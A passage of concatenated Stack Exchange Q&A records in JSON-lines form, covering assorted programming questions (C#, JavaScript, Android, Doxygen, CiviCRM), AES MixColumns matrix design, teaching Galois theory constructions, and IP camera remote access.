Char.IsLetter(x));\n }\n<\/code>\nAnswer: Try this with ToCharArray():\n<code>public bool checkString(String s)\n{\n bool retValue = s.ToCharArray()\n .Any(c => ((int)c > 64 && (int)c < 91) || \n ((int)c > 96 && (int)c < 123));\n return retValue\n}\n<\/code>\nAnswer: Just for sake of completion.\n<code>\/\/ Regex to check the value consists of letters\n\/\/ with atleast 1 character\nprivate static Regex reg = new Regex(@\"[a-zA-Z]+\");\n\npublic bool checkString(String s)\n{\n return reg.Match(s).Success;\n}\n<\/code>\nAnswer: What about this?\n<code>if (Regex.IsMatch(yourString, \"[a-zA-Z]\"))\n{\n}\n<\/code>\nComment: Ye, sorry - I didn't understand what he wants. I saw after he updated his post. Corrected\nAnswer: <code>static void Main(string[] args)\n {\n Console.WriteLine(checkString(\"137563475634c756\"));\n }\n static public bool checkString(String s)\n {\n return Regex.IsMatch(s, \"[a-zA-Z]\");\n }\n<\/code>\nIt Returns True.\n","meta":{"source":"stackoverflow","title":"Check String of chars","dup_signals":{}},"subset":"stackexchange"} +{"text":"Prefill webform with civicrm activity data\n\nQuestion: I want to prefill a webform with data from a specific CiviCRM activity in order to edit the activity using the webform. I want to do this by having an \"Edit\" link in a Drupal View of CiviCRM activities. These activities may or may not be associated with a case, so let's assume they aren't. I've turned on \"Update Existing Activity\" in the webform for all of the statuses.\nCan someone confirm that I can do this, and if so, what is the proper form of the URL for the link in the view? I've tried a bunch of different ones and can't seem to get it.\nComment: What about VBO to modify a field ?\nComment: For Bulk operations - absolutley. But it's a lot of overhead to update a single activity.\nComment: Guy: did you have a chance to review the screenshots I posted? Let me know of there is anything else I can add to help you make this work.\nAnswer: Below please find some screenshots to illustrate how to do this:\n1. This is a View of Activities. Each Activity has an Update button [that's a Global: Custom Text field -> Text Update; Rewrite results: Output this field as a link -> to the webform URL with <code>case-worker-form?cid2=[contact_id]&aid=[id]<\/code> and bootstrap classes btn to make it a button] -> the URL that is constructed is <code>case-worker-form?cid2=41218&aid=19153<\/code>\n\n2. The webform case-worker-form -> receives this data. That form is set up such that cid1 = the logged in user (the social worker); cid2 = the client; aid = activity id of the activity to be updated; \n\n3. Let's edit the subject e.g. -> \n\n4. Result:\n\n5. Note the Webform just has Update Existing Activity set to None (as we're matching by aid)\n\nAdd on:\nI've double checked that this is (still) working on our latest webform civicrm 5.x\n<code>root@f4d0afb6c36d:\/var\/www\/html\/sites\/default\/modules\/webform_civicrm# git log\ncommit 76b444bf5192ddf4663a0222540684a230d8e39e\nMerge: b54ddfd ef2a518\nAuthor: Karin Gerritsen <KarinG>\nDate: Thu Sep 12 11:24:26 2019 -0600\n Merge pull request #251 from colemanw\/rel7\n Use api to retrieve relationship data\n<\/code>\nAdd - on config notes:\n\nensure your views field is configured such that commas are stripped from cid and aid before passing them into the webform\nensure your webform is configured to allow an activity of the type you want updated -> setting it to -user select- will ensure that\nComment: I figured out why mine wasn't working. Seems obvious now, but I missed it. On ANY contact field that you are sending the info for in the URL, you have to check the \"Use contact id from URL\" checkbox under \"Default value\" for that webform field. If any of the contact fields that you sending the value for do not have that box checked, none of the form will load. So the final form of the URL I used was https:\/\/yourdomain\/yourwebform?cid2=xxx&aid=xxx&cid1=xx. Thanks for the help.\nComment: Yes passing cid via arguments does require the Contact Element to be configured as such. Happy to hear you got things working.\nAnswer: Having \"Update Existing Activity\" setting turned on, prefills the form with the matching activity based on Type and Status. In case of multiple activities, it prefills\/updates the first one.\nAdding '&activity1=activityID' in your webform url, irrespective of the 'Update Existing Activity' setting, will prefill and update the activity (with id=activityID).\nIn case of revisioning you might need to provide latest activity ID in url or it might not work. Think you could have some custom code or configuration in view to fetch the latest activity id for a contact, to make it work.\nAnswer: This should work but is a bug in the latest version of Webform CiviCRM. Will open a ticket. \n(Update)\nWebform requires that the form is configured a certain way on the civicrm\u00a0tab for activities in order to load the activity. It appears that at least 1 contact on the form needs to be set as a participant on the webform for the autoload to work. nb. I'm going to investigate further if other combinations will or will not work. \nComment: I think this is right. I've tried all the iterations for the URL and I can't get it to work.\nComment: If you think there is a bug please do let us know - we've got this working on a number of sites though; URLs in this format: case-worker-form?cid2=41218&aid=19153 work fine as long as the receiving webform is configured properly.\nComment: I just ran a test with our webform civicrm 5.x latest - commit 76b444bf5192ddf4663a0222540684a230d8e39e\nMerge: b54ddfd ef2a518 Author: Karin Gerritsen \nDate: Thu Sep 12 11:24:26 2019 -0600\nMerge pull request #251 from colemanw\/rel7 - and all is working well. Will add screenshots to my answer.\nComment: Jamie: can you please either open an issue with details on how to reproduce or acknowledge there is no bug - that passing on aid in URL works as described by me in both 4.x and 5.x?\nComment: Hi @karinG-SemberIT - Sorry ran out of time last week. I've done some more investigating and it seems that the activity ID is loaded but only in certain scenarios where the source\/target\/assignee fields are being set by the form. There may also be a bug with the \"none\" option. In your example above you set the activity participants to be contacts on the form.\nComment: I'm going to do some more investigating to see what those precise scenarios are as my sense is that the activity should load even if you don't set these fields, as there is good reason that you may not want to change the source, assignee or with fields on the form. I'm also not sure if it works with multiple activities. Will report back in the next few days.\nComment: Hi Jamie - You will need to pass on the cid2 for the Activity Target (if your webform config has a cid1 as logged in user) -> but you can then decide to disable [see my example] or hide that from the form if in your workflow target is not supposed to be edited; Assign to can be handled similarly; Re: multiple activities - we don't have a pathway for ?aid1, ?aid2 to be added as arguments. If you want to e.g. complete all activities of a certain type e.g. then best to use Views Bulk Operations.\nComment: I still don't have this working either. Just getting back to reviewing the latest notes here. Will investigate over the next few days and report.\nComment: Per my comment above on the main answer, double check that \"Use contact id from URL\" is checked for all contacts on the webform. If it isn't on even one contact field, the entire form won't load.\n","meta":{"source":"civicrm.stackexchange","title":"Prefill webform with civicrm activity data","dup_signals":{}},"subset":"stackexchange"} +{"text":"doxygen auto reference external links?\n\nQuestion: I use some external libraries in my project, e.g. libev.\nI realize I can use markdown (or href) and put\n [libev](http:\/\/software.schmorp.de\/pkg\/libev.html)\nin my document.\nHowever that only works in a single place, and I don't want to have to put that in the dozens of places I refer to libev.\nIf it's \"ClientWatcher\" (one of my classes), doxygen auto links to the class.\nIs there some way to tell doxygen to make all occurrences of the word \"libev\" auto link to http:\/\/software.schmorp.de\/pkg\/libev.html (for example)\nAnswer: If you add\n<code>ALIASES += libev=\"<a href=\\\"http:\/\/software.schmorp.de\/pkg\/libev.html\\\">libev<\/a>\"\n<\/code>\nto Doxygen's configuration file you can use the <code>\\libev<\/code> command to generate a link, like so\n<code>\/** @mainpage\n * See \\libev for more info.\n *\/\n<\/code>\nComment: I considered trying this. Not quite what I wanted, but certainly an improvement over specifying it in lots of places.\n","meta":{"source":"stackoverflow","title":"doxygen auto reference external links?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Editing closed or off topic questions\n\nQuestion: I have made a few edits to questions that were closed or off topic, I always ask the OP if they are happy with the edit, and only offer it, after it's received a bit of attention and there seems to be no editing, or if I know the OP and we discuss help with editing.\nDoes a dog's pink or white skin need special care?\nWhy should I not give water or food to a wounded bird?\nWhat is causing behaviour changes in our young adult dog?\n\nHow does the community feel about this type of editing? \nIn these early stages, it is a small group we are trying to get our site organised; but how should we proceed with this as the site grows?\nComment: Whether or not you think you can interpret the OPs intent or not, it is important to remember that you aren't the OP, so drastic edits need to still be avoided.\nComment: @LucyGalv\u00e1n if you are unhappy with the current wording, you can click the `edit` button below the question (or [here](http:\/\/pets.stackexchange.com\/posts\/575\/edit)). It is quite common that questions are edited by members of the community to improve their quality. However if you are unhappy with an edit you are free to roll back any changes made. You can do that by clicking on the link \"edited Oct 12 at 16:22\" which will bring you to the revision history of the post. There you can chose a revision and click rollback. If you need more help you can always drop by in [chat].\nComment: So... Should I re-write the question? I didn't understand the changes so that's why I didn't want to interfere. How can I fix this?\nComment: @LucyGalv\u00e1n does the question, as it is currently worded adequately ask your question? Or is it different from what you intended to ask?\nComment: It seems they are talking about a specific dog but it seems that it doesn't change what I intended to ask in the first place.\nComment: @LucyGalv\u00e1n I didn't think you were discussing a specific dog, but asking a general question about skin type. If you are happy with the edit, then there is nothing for you to worry about. It's only if I had edited it to change what you were trying to ask.\nAnswer: One thing to avoid is to change the intent of the question completely. Edits that are too radical or change the fundamental intent of the question should not be acceptable - some questions are just not repairable, and sometimes we have to ask new questions or risk completely changing the OP's question, which is something we don't want to do. \nSometimes, we can't fix a question and being it off of the on hold status. That is alright - we can't save everything. \nMaking some attempt to correct a question to make it fit is alright, but changing the question or adding details that only the OP would be able to confirm or know about is not a very good idea - the point of editing is to make adjustments, not to change things completely. \nIt is entirely possible a question will be on hold for a day or more or perhaps forever (especially if it is considered off topic). While it is not ideal, it is just the way it goes - we can't make everything work, as much as we would like to. \nWe are attempting to create a good solid base of awesome questions, and editing is part of that! But we also don't want to change the intent of the question or make it completely unrecognizable from what the OP was actually trying to ask (unless it is poorly written, etc). \nThis is one of those cases where we don't want to treat edits now any different than the edits we do later when the site is in public beta. We want good edits that improve questions, not change them or make assumptions about things that we really have no way of knowing. \nComment: Coming across off-topic questions also helps people realise what's not on topic.\n","meta":{"source":"pets.meta.stackexchange","title":"Editing closed or off topic questions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Clustering algorithm for obtaining equal sized clusters\n\nQuestion: I am trying to form clusters around medoids using PAM algorithm in R. Is there anyway of fixing the cluster size for PAM (somewhat bruteforce the cluster size) ? Are there any other clustering algorithms that will provide equal sized clusters for medoids ?\nThank you in advance for your help.\nComment: Duplicate to: http:\/\/stats.stackexchange.com\/questions\/8744\/clustering-procedure-where-each-cluster-has-an-equal-number-of-points\nComment: Special case of duplicate: [Optimal grouping\/clustering of items in groups with minimum size](http:\/\/stackoverflow.com\/questions\/37589168\/optimal-grouping-clustering-of-items-in-groups-with-minimum-size)\nComment: Hi @Lawrence did you get any answer to this problem? I'm looking for an R implementation of such algorithm, but couldn't find any. thanks\nAnswer: You can modify a clustering algorithm to suit your needs.\nYou can follow this Tutorial for Same-Size K-Means, or simply use this algorithm from the <code>tutorial<\/code> package\/module in ELKI (build the latest version from GitHub, because I just fixed a bug there - this will be included in ELKI 0.7.2).\nEssentially, this algorithm performs a k-means style least-squares optimization, but all clusters must have the same size (if N\/k is not integer, the cluster sizes may vary by 1).\nIf you go to above tutorial and scroll to the bottom, you can see example results.\nComment: Thank you for your answer. Unfortunately I am working with a dissimilarity matrix (I do not have coordinates to be able to use kmeans). My data is in the form objects and a weight is attributes to each pair. That's why I am using PAM. I have however developed my own clustering algorithm appropriate to my problem. Will post it when I finish coding. Thanks again !\nComment: You can essentially follow the tutorial, but work with KMedoidsEM instead of KMeans. It's similar to k-means but uses the medoid like PAM. With above modifications, you will get a k-medoids that ensures clusters have the same size.\n","meta":{"source":"stackoverflow","title":"Clustering algorithm for obtaining equal sized clusters","dup_signals":{}},"subset":"stackexchange"} +{"text":"JavaScript - I can't save the value of a variable after a loop\n\nQuestion: I want to save the value of a variable in a loop and continue to use it, but I don't know how to do it\n<code>function slide(){ \n var picter = document.getElementsByClassName(\"picter\");\n var g=0;\n var c=0;\n for(var i=0;i<picter.length;i++){ \n if(getComputedStyle(picter[i]).opacity == 1){\n picter[g].style.opacity = 0;\n g+=1;\n picter[g].style.opacity = 1;\n break;\n }\n }\n \/\/alert(g);\n}\n\n<div class=\"slider\" >\n <a class=\"back arrow\" onclick=\"slide()\">Back<\/a>\n\n <div class=\"picterSlider\">\n <div class=\"picter picterLeft\">Left<\/div>\n <div class=\"picter picterCenter\">Center<\/div>\n <div class=\"picter picterRight\">Right<\/div>\n <\/div>\n\n <a class=\"next arrow\" onclick=\"slide()\">Next<\/a>\n<\/div>\n<\/code>\nI tried to set to another variable, but it does not work(\nComment: What exactly are you trying to achieve with this code ? It is not clear to me what variable are you trying to set or what for.\nComment: Which variable exactly do you want to save after the loop? the only variable i see you might want to save is `i`. so clarify which variable in the loop do you want to save after the loop execution.\nComment: I need the variable g to retain its value after the loop and to use the stored value in the next use of the loop\nAnswer: You can set variable as a global variable\n<code>var picter;\nvar g=0;\nvar c=0;\nfunction slide(){ \n = document.getElementsByClassName(\"picter\");\n\n for(var i=0;i<picter.length;i++){ \n if(getComputedStyle(picter[i]).opacity == 1){\n picter[g].style.opacity = 0;\n g+=1;\n picter[g].style.opacity = 1;\n break;\n }\n }\n \/\/alert(g);\n}\n\n<div class=\"slider\" >\n <a class=\"back arrow\" onclick=\"slide()\">Back<\/a>\n\n <div class=\"picterSlider\">\n <div class=\"picter picterLeft\">Left<\/div>\n <div class=\"picter picterCenter\">Center<\/div>\n <div class=\"picter picterRight\">Right<\/div>\n <\/div>\n\n <a class=\"next arrow\" onclick=\"slide()\">Next<\/a>\n<\/div>\n<\/code>\nOr you also can save your value of variable into <code>localstorage<\/code>. And everytime you want to use, you can retrive it from <code>localstograte<\/code>\nComment: ahhahah, sorry for such an idiotic question) I'am firsting programmist\nAnswer: I think I see what you're trying to do here, you could have a look on the snippet with the comments and I'd be happy to answer any of your questions if any.\n\n<code>\/\/ Define g globally\nvar g = 0;\n\nfunction slide(increment) {\n var picter = document.getElementsByClassName(\"picter\");\n var c = 0;\n for (var i = 0; i < picter.length; i++) {\n if (getComputedStyle(picter[i]).opacity == 1) {\n picter[g].style.opacity = 0;\n g += increment;\n \n \/\/ Make sure g doesn't get below 0\n g = g < 0 ? 0 : g;\n \n \/\/ Make sure g doesn't go beyond the last element\n g = g > picter.length - 1 ? picter.length - 1 : g;\n picter[g].style.opacity = 1;\n break;\n }\n }\n \n alert(g);\n}<\/code>\n<code><div class=\"slider\">\n <a class=\"back arrow\" onclick=\"slide(-1)\">Back<\/a>\n\n <div class=\"picterSlider\">\n <div class=\"picter picterLeft\">Left<\/div>\n <div class=\"picter picterCenter\">Center<\/div>\n <div class=\"picter picterRight\">Right<\/div>\n <\/div>\n\n <a class=\"next arrow\" onclick=\"slide(1)\">Next<\/a>\n<\/div><\/code>\n","meta":{"source":"stackoverflow","title":"JavaScript - I can't save the value of a variable after a loop","dup_signals":{}},"subset":"stackexchange"} +{"text":"Impossibility of trisecting the angle, doubling the cube and alike, what are reasons for or against discussing them in a course on algebra?\n\nQuestion: When I taught courses on algebra giving a first exposition to Galois theory I usually included some discussion of classical results showing the impossibility of constructing certain points with ruler and compass, such a the cube root of $2$ (Delian problem) and the trisection of a (generic) angle. \nHowever, sometimes I think maybe this is not that good an allocation of time. It took me quite some time to recall and\/or to introduce in precise terms what it means to construct something, which feels a bit like an isolated subject in such a course. Likewise, the results, while historically important and interesting, do not seem of much use later on.\nSince as said I did include the subject, needless to say, I can also see some merit in it. Yet, I never quite managed to make up my mind. \nThus, I would like further input on this subject:\nWhat are reasons for or against teaching the impossibility of certain geometric constructions in a course on algebra that covers the basics of Galois theory?\nComment: These are proved in Cox's *Galois Theory* as Examples 10.1.9, 10.1.10, and (squaring the circle) 10.1.11. The lead-up only takes about 6 pages, after which they are all captured in one fell-swoop (though they refer back to earlier examples\/theorems; the one accept-without-proof, for squaring the circle, is that $\\pi$ is transcendental). Looking back over this material, and depending on class size \/ interest, I wonder whether you could have a day in which students presented (in small groups) on these three examples. Practice \"filling in the details\" might be a reason to spend time on them.\nComment: @BenCrowell there'd remain what is arguably the original motivation namely the (un)solvability of polynomial equations by radicals. But I *agree* that the classical results are interesting.\nComment: When I took the required course covering Galois theory, it seemed to me like the most useless and silly thing I had ever studied. The classical results you're talking about were the only applications we ever saw that gave me any hint of why anyone would care about the subject -- and even they seemed to me like extremely weak motivation. If you didn't use these topics as motivation, what *would* you tell your students was the reason they should care about Galois theory?\nComment: Will you choose whether the question is about \"a course on Galois theory\" (as at the end of the post), or \"a course on algebra\" (as in the title)? For the first, I'd include these classical topics; for the second, I'd replace Galois theory with other algebraic topics entirely. So my answer depends on which question you're asking.\nComment: @MattF. thanks I agree it was unclear, I edited it a bit It is somewhat in the middle; the context is a course on algebra that includes basics of Galois theory, basically builds up to them. Not to cover Galois theory is a non-option but it could be deemphasized in order to have a time for other things. (The later is basically what I am thinking about and motivated this question.)\nComment: @BenjaminDickman thanks for the reference and the other input. I will check it out soon.\nAnswer: Let me first say how I have taught this, and then why it was worth doing.\nHere is the stripped down version I speak of. The first block of bullet points is one day.\n\nForget about straight edge and compass, no one uses them. Fortunately, I think we still have another few years of students who have still seen the standard five function calculator: $+$, $-$, $\\times$, $\\div$, $\\sqrt{ \\ }$. So the question was: using these keys, and the ability to type in integers or recopy numbers that you have computed before, what can you compute? Can you compute $\\sqrt[3]{2}$, or $\\cos (20^{\\circ})$? \nWe'll show that the answer is no! Suppose that we could compute $\\sqrt[3]{2}$. Let $\\theta_1$, $\\theta_2$, ..., $\\theta_N$ be the sequence of numbers displayed on our calculator. So each $\\theta_i$ is made up of one or two previous $\\theta_i$, using the five operations above. \nLet $K_i$ be the field $\\mathbb{Q}(\\theta_1, \\theta_2, \\ldots, \\theta_i)$. Then $[K_{i+1}:K_i]=1$ or $2$ for each $i$. So $[K_N:\\mathbb{Q}]=2^r$ for some $r$.\nIf $\\sqrt[3]{2} \\in K_N$, then $\\mathbb{Q}(\\sqrt[3]{2}) \\subseteq K_N$. But then $3 = [\\mathbb{Q}(\\sqrt[3]{2}):\\mathbb{Q}]$ divides $2^r$, a contradiction.\nTell students that the historical version of this problem is using straight-edge and compass, not calculators. \n\nHere ends that day, but later follow up:\n\nAfter we have introduced Galois groups, have them prove the converse: If $\\mathrm{Gal}(K\/\\mathbb{Q})$ is a $2$-group, then elements of $K$ can be constructed using the $5$-function calculator.\nWork out the construction of the $17$-gon using the above.\nWhen we get to solvability, point out that \"$2$-group\" means \"all Jordan-Holder constituents are $\\mathbb{Z}\/2\\mathbb{Z}$\", and that we are now looking for an analogous description of fields that involve any radical extension.\n\nThe most recent time I taught this course, I did it as an IBL class. Here is the main worksheet corresponding to this material.\n\nSo, why do I think this was worth it? \n\nI think it is a moderately interesting question, and it can be attacked just using basic field theory tools like degree of an extension and minimal polynomials. It's nice to reach an application before we bring in the Galois groups. If you've never seen it done, the idea of proving that no formula exists can seem like a miracle, and the quintic case is hard enough that I don't think most students internalize the full argument.\nThe story about sequentially computing a sequence of numbers on your calculator makes the tower of field extensions natural.\nThe followup of proving that \"Galois group is a $2$-group\" implies \"tower of square root extensions\" is a good preparation for Kummer theory. It also makes the question \"what criterion describes a tower of radical extensions\" natural.\nComment: This is a creative solution! I remember it from a previous comment of yours. Do you have an opinion on the broader question -- do you think Galois theory merits a place in a one-year undergraduate algebra curriculum, or would you rather emphasize material more relevant to coding, computer graphics, cryptology, physical symmetries? See here for discussion: http:\/\/math.stackexchange.com\/questions\/449066\nComment: The calculator motivation is a good idea, thanks for sharing it. Re what @MattF. said: http:\/\/matheducators.stackexchange.com\/questions\/2612\/galois-theory-necessary is also related but focused on a specific context. Maybe there is room for another question along these lines.\nComment: On the one hand, I love this idea. On the other hand, none of my students has a calculator with a square-root button. Instead, they have calculators with something like a square-root-rounded-off-to-thirteen-digits button. I'd expect the brighter ones to realize that your analysis is irrelevant to the question of whether their calculators can accurately find the first thirteen digits of the cube root of 2.\nAnswer: Perhaps rather than spend time establishing that trisecting an angle is impossible via Euclidean (ruler-compass) constructions,\nyou could instead (a)\u00a0Make that claim without proof,\nand (b)\u00a0Mention that different axioms do permit angle trisection: \n\n\u00a0 \u00a0\n\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \n\n(Figure from Geometric Folding Algorithms: Linkages, Origami, Polyhedra, p.286.)\n\nThis would (temporarily) turn the topic away from Galois theory and toward the history and philosophy of mathematics, which could be an illuminating interlude.\nYou could even have the students trisect an angle in-class via Abe's construction! :-) ~15 minutes.\nComment: @quid: Alperin, Roger C. \"A mathematical theory of origami constructions and numbers.\" *New York J. Math* 6.119 (2000): 133. ([PDF download](http:\/\/nyjm.albany.edu\/j\/2000\/6-8.pdf).): \"In this article we give a simplified set of axioms for mathematical\norigami and numbers. The axioms are hierarchically structured so that the\naddition of each axiom, allowing new geometrical complications, is mirrored in\nthe field theory of the possible constructible numbers. The fields of Thalian,\nPythagorean, Euclidean and Origami numbers are thus obtained using this set\nof axioms.\"\nComment: @quid I'm not sure what text you are using, but you might check Cox's *Galois Theory*. Chapter 10 is entitled \"Geometric Constructions\" and includes an optional section, 10.3, called \"Origami.\" (The first reference provided in that section is the R.C. Alperin paper suggested by JO'R above!)\nComment: That's an interesting idea. It also makes me wonder what (if any) the characterization of the points constructible in this way would be. (But this is another question.)\nComment: Thanks a lot for this reference. This looks very interesting for my purpose.\nComment: @quid: See *Some Remarks on Conic Constructible Numbers* on pp. 6-7 of my manuscript [**A Detailed and Elementary Solution to** $x^{17}=1$](http:\/\/pballew.net\/Constructable_17gon.pdf). Briefly, these are numbers that can be obtained by using finite sequences of the four arithmetic operations along with the operation of \"solving cubic equations\" starting with the rationals, in the same way that the constructible numbers can be obtained by using finite sequences of the four arithmetic operations along with the operation of \"solving quadratic equations\" starting with the rationals.\nComment: I just noticed that the link I gave in my previous comment is no longer valid. Here's a copy I stuck in Reseach Gate a while back: [**A Detailed and Elementary Solution to** $x^{17} = 1$](https:\/\/www.researchgate.net\/publication\/316692623_A_detailed_and_elementary_solution_to_x17_1).\n","meta":{"source":"matheducators.stackexchange","title":"Impossibility of trisecting the angle, doubling the cube and alike, what are reasons for or against discussing them in a course on algebra?","dup_signals":{}},"subset":"stackexchange"} +{"text":"IP cameras are viewable in home Wifi and REMOTE Wifi, but not in 3G?\n\nQuestion: I was in the process of setting up my IP camera port forwarding so I can view them remotely, but to my surprise, it's already working somewhat, but only if I am on a remote\/external wifi, not on a non-wifi network such as my iphone data plan. How is this even possible!?? \nHere's my set up:\n\nA Google Wifi is hardwired to my u-verse router. u-verse wifi is off so GWF is the exclusive wifi that my IP cams are connected to at home\nI was able to view the cameras when I was at the home WIFI, but not when I am on data (as expected), so I proceeded to set up remote access\/port forwarding\nDid the static IP on both cameras GUI\nSet up DHCP IP reservations and port forwarding on my GWI GUI(for only one of the cameras, just to ensure the first one would work)\nStill couldn't see my camera on my iphone when it's on data plan. Was told by Google support that I would also need to port forward my GWF within the u-verse router, which I haven't done, but will do later tonight. So my cameras should still be protected, right?\nTo my surprise, when I am at work, thus using a different, external, and remote Wifi, I could actually see BOTH cameras. If I get off the work wifi, for example, using the phone's data network, I couldn't see the cameras (as I would expect until I complete step 5).\n\nSo how is this even possible? It's as if it's treating my work's wifi the same as my home wifi, which of course is impossible. The only thing that would give it away is the static IP and DHCP IP reservations, but why does it only work on wifi but not on data? Can someone please explain to me? Is there a security issue with my network? Thanks!\nAnswer: It sounds as though the client application you are using on your phone is only allowing connections over WiFi and not via 3G. Video feeds do use quite a bit of data relative to other phone applications. This may be something you can configure within the app to allow the video feed to work via 3G.\nMany phone applications treat their WiFi connections and the telcom network connections very differently in many ways. Not knowing more about your situation I would verify the app's settings and also it's support for streaming video over 3G. \nOn the security side: When you open this to the Internet you have given the world attack surface on your network. There are numerous bugs and security issues with typical remote cameras. Do be aware that other people may one day be able to access this as well. Likewise, do consider that they may also use this device to pivot into other devices on your network.\nComment: There is a great talk about this on Youtube: https:\/\/www.youtube.com\/watch?v=B8DjTcANBx0\n","meta":{"source":"security.stackexchange","title":"IP cameras are viewable in home Wifi and REMOTE Wifi, but not in 3G?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to detect the state of a ProgressDialog\n\nQuestion: My Activity checks for internet connectivity and displays a ProgresDialog if there's connectivity.\nNow, if the ProgressdlDialog is showing and internet connectivity becomes unavailable, the poor ProgressDialog keeps loading till enternity.\nSo, I want detect the state of the progressdialog; and then show an AlertDialog if it's loading and internet connectivity becomes unavailable .\nAnswer: You could use CONNECTIVITY_CHANGE Receiver, to know when connectivity change and than use a method to get the actual state of your connection using below code : \n<code>ConnectivityManager cm =\n (ConnectivityManager)context.getSystemService(Context.CONNECTIVITY_SERVICE);\n\nNetworkInfo activeNetwork = cm.getActiveNetworkInfo();\nboolean isConnected = activeNetwork != null &&\n activeNetwork.isConnectedOrConnecting();\n<\/code>\nRefer to : http:\/\/developer.android.com\/intl\/pt-br\/training\/monitoring-device-state\/connectivity-monitoring.html\nhttp:\/\/viralpatel.net\/blogs\/android-internet-connection-status-network-change\/\nAnswer: To detect the ProgressDialog\n<code>ProgressDialog progressdialog = new ProgressDialog(getActivity());\nprogressdialog.show();\nif(progressdialog.isShowing())\n{\nprogressdialog.dismiss();\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to detect the state of a ProgressDialog","dup_signals":{}},"subset":"stackexchange"} +{"text":"A Lightweight Matrix Suggestion for MixColumns State of AES\n\nQuestion: We know that the matrix in the MixColumns state of AES is the circulant MDS matrix $C=circ(2,3,1,1)$ which is defined over $GF(2^8)$ with the irreducible polynomial $f=x^{8}+x^{4}+x^{3}+x+1$. Let we show the elements of $GF(2^8)$ with positive integer numbers. For example, when we assume that the elements $2$, $3$ and $4$, we mean $\\alpha$, $\\alpha+1$and $\\alpha^2$ where $\\alpha$ is a root of $f$. Consider the following matrix over $GF(2^8)$\n$$\nA= \\left(\n \\begin {array}{cccc}\n 2&1&1&1\\\\\n1&1&3&2\\\\ \n1&3&4&1\\\\ \n1&2&1&3\n\\end {array}\n \\right)\n$$\nAll squarer sub-matrices of $A$ are non-singular or in the other words $A$ is an MDS(super-regular) matrix over $GF(2^8)$. \nMy question: Is matrix $A$ is suitable for software Implementation rather than $C$?\nEdit:(Motivated by @Richie Frame comment)\nThe inverse of $A$, denoted with $A^{-1}$, looks like to semi-circulant matrix as shown \n$$\nA^{-1}=\n \\left(\n \\begin {array}{cccc}\n 11&194&120&173\\\\ \n194&57&173&11\\\\ \n120&173&111&50\\\\ \n173&11&50&120\n\\end {array} \\right)\n$$ \nAlthough $A^{-1}$ is consist of seven elements $(11, 50,57,111, 120, 173, 194)$, from two elements $11$ and $50$ we can obtain other elements as follows\n$$\n \\left\\{\n \\begin {array}{lcr}\n11+50&=&57, \\\\\n11+50^2 &=& 120, \\\\\n11^2+50^5 &=& 173, \\\\\n11^8+50^8 &=& 194 ,\\\\\n173+194&=&111.\n\\end {array} \\right.\n$$\nEdit:(Motivated by @e-sushi comment)\nAfter Definition 5 of the second paper, we have \nFor an efficient implementation of the perfect diffusion layer, it is desirable to have maximum number of 1's and minimum number of different entries in the MDS matrix.\nAlthough based on the this terminology $C$ has an efficient implementation rather than $A$, I want to see this one by terminology of XOR and xtime. \nAfter Proposition 3 of the second paper, the authors proved that multiplication\nby the matrix of AES can be implemented using $15$ XORs, $4$ xtimes (or $4$ table lookups) and $3$ temporary variables.\nUnfortunately I do not know how to obtain XOR and xtime when the matrix $A$ is applied in MixColumns state of AES. \nIn addition,\nI used software Implementation expression in the question since the matrix of AES($C$) is a circulant matrix, but the matrix $A$ is not circulant and in 31th paper of FSE 2018, it is claimed that \nusing a circulant matrix gives adequate flexibility to\ndo a trade-off between the area requirement and clock cycle, whereas most of the other matrix types are suitable for either one but not both circumstances.\nComment: Why do you think it would be more suitable? or why do you consider it lighter ?\nComment: `Is matrix A is suitable for software Implementation rather than C?` \u2013 Depending on how you implement things, \"lighter\" as mentioned in those papers does not directly translate to \"more suitable\" when talking about implemetation. Related to that terminology: Can you please define what exactly you mean with \"more suitable for software Implementation\"? In what way?\nComment: @Ruggero Please see Section 3 of [this paper](https:\/\/www.researchgate.net\/publication\/37442986_Perfect_diffusion_primitives_for_block_ciphers_-_Building_efficient_MDS_matrices) or Section 2 of [this paper](https:\/\/link.springer.com\/article\/10.1007\/s12095-014-0116-3). The second paper explained more clearly the concept of lighter in construction of MDS matrices.\nComment: @e-sushi you right. I will edit the question to clarify what did I mean by *suitable for software Implementation*. thanks for your comment.\nAnswer: I'm not sure to what paper you reference with \"30th paper from FSE 2018\" because in this list the 30. paper is not about implementing MDS matrices. As the 31. paper is, I assume you refer to this, entitled \"Shorter Linear Straight-Line Programs for MDS matrices\".\nWhen you take the XOR count as a metric for efficiency, you can just compute this for your matrix and end up with an naive XOR count of 144, an optimized XOR count of 103 when using the SLP heuristics from the above paper. While the 144 XORs for the naive implementation are better than 152 XORs we would need for a naive implementation of the AES MC matrix, the later can also be optimized with SLPs and this will give you an implementation with only 97 XORs.\nSo, when only using the XOR count metric, it appears that your matrix is not more efficient than the AES matrix.\nOf course it also depends a lot what application you have, if you only need to encrypt stuff (e.g. using AES in CTR mode), looking only at the \"normal\" matrices is fine, but when you also need decryption and thus the inverse matrices, these have to be implemented as well.\nComment: @Amin235 sure you can ask me about it, I guess you are talking about our implementation (that is https:\/\/github.com\/pfasante\/shorter_linear_slps_for_mds_matrices)? Not sure thou, if this is the right place or if the github repository is the better place.\nComment: Thanks for your answer. Is it possible to ask you to address the GitHub code of SLP heuristics.\n","meta":{"source":"crypto.stackexchange","title":"A Lightweight Matrix Suggestion for MixColumns State of AES","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to create a child array from a parrent array?\n\nQuestion: My app uses multiple tableViews.\nIt contains a RootViewController having a NSMutableArray, named mainArray with id,parent_id,title,subtitle,description.\nIn my SecondTableViewController, I need to create an childArray from my mainArray depending on parent_id so I can populate the tableviewcells.\nI need my childArray1 to contain only id,title,subtitle for each parent_id = 1 childArray2 to contain only id,title,subtitle for each parent_id = 2 and so on.\nAre there some hints for doing this ? \nComment: First, have you considered working with NSDictionnary ? It will be much simpler to handle your elements because you have the key->value format instead of just indexes like in NSArray.\nComment: I am open to any new ideas. Like i said i'm new to Xcode.\nComment: Not sure to get you. Can you edit adding how mainArray is built ? It's an array of array?\nComment: the mainArray is an array from JSON.I'll give you the link to see the output of the json_ecode http:\/\/192.ro\/ibacau\/json.php\nAnswer: Try by using dictionaries, I guess is better\n<code>NSDictionary *parent = @{@\"id\":@(1),@\"title\":@\"Root\",@\"subtitle\":@\"my subtitle\",@\"description\":@\"something\"};\nNSDictionary *child1 = 